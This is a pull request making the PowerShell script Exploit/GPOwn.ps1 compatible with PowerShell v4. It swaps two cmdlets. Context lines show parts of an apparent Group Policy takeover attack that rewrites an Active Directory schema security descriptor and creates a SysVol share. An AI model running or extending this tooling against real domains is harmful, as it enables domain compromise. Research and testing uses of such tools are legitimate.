### PR TITLE
Make Exploit PowerShell v4 Compatible

### DIFF
--- a/Exploit/GPOwn.ps1
+++ b/Exploit/GPOwn.ps1
@@ -183,7 +183,7 @@ function install
 	}
 	else
 	{
-		Write-Information "No service account used. Running as network service" 
+		Write-Host "No service account used. Running as network service" 
 	}
 	
 
@@ -564,7 +564,7 @@ if($bPartSuccess)
     $GPCobj = Get-ADObject -SearchBase $($theRootDSE.schemaNamingContext) -LDAPFilter "(ldapdisplayname=groupPolicyContainer)" -Server localhost
     Set-ADObject -Server localhost -Identity $($GPCobj.DistinguishedName) -Add @{defaultSecurityDescriptor='D:P(A;CI;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOSDRCWDWO;;;EA)(A;CI;CCDCLCSWRPWPDTLOSDRCWDWO;;;CO)(A;CI;CCDCLCSWRPWPDTLOSDRCWDWO;;;SY)(A;CI;LCRPLORC;;;AU)(OA;CI;CR;edacfd8f-ffb3-11d1-b41d-00a0c968f939;;AU)(A;CI;LCRPLORC;;;ED)'}
 
-    $newGUID = "{" + (New-Guid).guid + "}"
+    $newGUID = "{" + ([guid]::NewGuid()).ToString() + "}"
 
     md c:\sysvol
     New-SmbShare -Name "SysVol" -Path "C:\sysvol" 


### PR DESCRIPTION
The script uses a few cmdlets that fail on PowerShell v4, which is the default on Server 2012 R2. This PR fixes those issues.